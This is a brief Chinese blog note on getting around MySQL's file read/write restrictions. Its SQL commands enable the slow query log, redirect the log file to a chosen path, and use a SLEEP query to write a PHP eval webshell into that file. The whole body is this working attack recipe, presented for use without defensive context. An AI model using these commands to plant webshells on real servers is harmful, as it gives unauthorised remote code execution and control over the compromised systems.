【笔记】MySQL禁用读写绕过

发表于 更新于 阅读次数:

前言

MySQL禁用读写绕过

正文

  • 启用满日志记录

<dir>:日志存储路径,作为Shell命令执行路径

1
2
SET GLOBAL SLOW_QUERY_LOG = 1;
SET GLOBAL SLOW_QUERY_LOG_FILE = '<dir>';
  • 向日志内写入后门
1
SELECT '<?php eval($_REQUEST['<pwd>']);?>' OR SLEEP(11);

完成

参考文献

哔哩哔哩——逆风微笑的代码狗